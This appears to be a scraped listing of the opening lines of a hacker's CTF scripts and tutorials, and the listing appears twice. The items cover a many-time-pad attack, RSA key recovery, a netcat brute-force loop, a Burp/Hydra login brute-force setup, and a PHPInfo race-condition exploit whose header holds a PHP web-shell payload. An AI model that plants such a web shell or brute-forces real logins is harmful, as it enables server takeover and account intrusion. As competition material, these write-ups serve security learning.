intrd

## tutorial_kali_autologin_afterupdate.txt
## Kali light xfce4 root autologin (works after lightdm update)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

Root autologin is broken after lighdtdm update, fix by doing this:
nano /etc/lightdm/lightdm.conf
  at [Seat:*] group uncomment/edit:
  autologin-user=root
  autologin-user-timeout=0

## many_time_pad_attack.py
#!/usr/bin/python
## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
# @author intrd - http://dann.com.br/
# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py)

import string
import collections
import sets, sys

# 11 unknown ciphertexts (in hex format), all encrpyted with the same key

## math_bot_parser.py
#!/usr/bin/python
## Math bot script - prog100-math_bot @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a

import re, sys, string, time
sys.path.append("../../LIBS/")
from int_netcat import Netcat

## br_allow.sh
#!/bin/bash
## IPtables - Rulescript to allow only brazilian ip's
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

# Brazil
ipset -F br.zone
ipset -N br.zone nethash
for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/br.zone)
       do ipset -A br.zone $IP

## tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
  Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
  and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
  Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing

## tutorial_disk_encryption.txt
## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
# @author intrd - http://dann.com.br/

Why not full disk encryption?
this setup is for systems who need performace..
experienced on ubuntu system w/ an existing user..

as root:
# apt-get install ecryptfs-utils cryptsetup
# apt-get install lsof

## rsa_egcd.py
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

import binascii, base64

p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41

## nc_bruteforce.sh
#!/bin/bash
## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

for letter in {A..Z} ; do
  echo $letter
  sleep 1
  (echo "yes" & sleep 1 & echo "$letter") | nc -i1 -w5 54.175.35.248 8002
done

## vpn_intrd.sh
#!/bin/bash

## Openvpn safe kill switch / isolate vpn connection using linux routing table (no iptables needed)
# Author: intrd@dann.com.br

# flush the entire routing table (incl cache)
sudo ip route flush table main
sudo ip route flush cache

# route the wan network but not a gateway

## phpinfo_exploit.py
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

import sys,Queue,threading,hashlib,os, requests,  pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT
	## Kali light xfce4 root autologin (works after lightdm update)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	Root autologin is broken after lighdtdm update, fix by doing this:
	nano /etc/lightdm/lightdm.conf
	at [Seat:*] group uncomment/edit:
	autologin-user=root
	autologin-user-timeout=0
	#!/usr/bin/python
	## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
	# @author intrd - http://dann.com.br/
	# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py)

	import string
	import collections
	import sets, sys

	# 11 unknown ciphertexts (in hex format), all encrpyted with the same key
	#!/usr/bin/python
	## Math bot script - prog100-math_bot @ alexctf 2017
	# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a

	import re, sys, string, time
	sys.path.append("../../LIBS/")
	from int_netcat import Netcat
	#!/bin/bash
	## IPtables - Rulescript to allow only brazilian ip's
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# Brazil
	ipset -F br.zone
	ipset -N br.zone nethash
	for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/br.zone)
	do ipset -A br.zone $IP
	## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
	# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## Burp csrf-rewritting macro
	- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
	Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
	and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
	Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
	- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
	## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
	# @author intrd - http://dann.com.br/

	Why not full disk encryption?
	this setup is for systems who need performace..
	experienced on ubuntu system w/ an existing user..

	as root:
	# apt-get install ecryptfs-utils cryptsetup
	# apt-get install lsof
	#!/usr/bin/python
	## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
	# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	import binascii, base64

	p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
	q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
	e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
	#!/bin/bash
	## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	for letter in {A..Z} ; do
	echo $letter
	sleep 1
	(echo "yes" & sleep 1 & echo "$letter") \| nc -i1 -w5 54.175.35.248 8002
	done
	#!/bin/bash

	## Openvpn safe kill switch / isolate vpn connection using linux routing table (no iptables needed)
	# Author: intrd@dann.com.br

	# flush the entire routing table (incl cache)
	sudo ip route flush table main
	sudo ip route flush cache

	# route the wan network but not a gateway
	## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
	# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## passwords.txt payload content
	# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

	import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re
	from subprocess import Popen, PIPE, STDOUT